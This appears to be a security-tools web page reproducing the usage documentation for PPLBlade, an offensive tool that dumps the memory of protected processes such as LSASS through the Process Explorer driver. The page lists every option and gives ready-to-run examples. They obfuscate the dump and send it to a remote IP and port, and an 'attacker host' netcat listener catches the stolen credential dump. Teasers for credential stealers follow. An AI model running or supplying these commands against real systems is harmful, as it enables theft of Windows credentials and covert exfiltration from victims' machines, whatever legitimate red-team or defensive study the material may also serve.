Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.
Overview of the techniques, used in this tool can be found here
Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.
It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.
Usage of PPLBlade.exe:
-driver string
Path where the driver file will be dropped (default: current directory)
-dumpmode string
Dump mode [local|network] (default "local")
-dumpname string
Name of the dump file (default "PPLBlade.dmp")
-handle string
Method to obtain target process handle [direct|procexp] (default "direct")
-help
Prints this help message
-ip string
IP of the remote server
-key string
XOR Key for obfuscation (default "PPLBlade")
-mode string
Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
-name string
Process name of target process
-network string
Method for network transfer[raw|smb] (default "raw")
-obfuscate
Obfuscate dump file
-pass string
SMB password
-pid int
PID of target process (prioritized over process name)
-port int
PORT on the remote server
-quiet
Quiet mode
-service string
Name of the service (default "PPLBlade")
-share string
share name
-user string
SMB username
Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup
Basic POC that uses PROCEXP152.sys to dump lsass:
PPLBlade.exe --mode dothatlsassthing
(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)
Upload the obfuscated LSASS dump onto a remote location:
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
Attacker host:
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp
Deobfuscate memory dump:
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…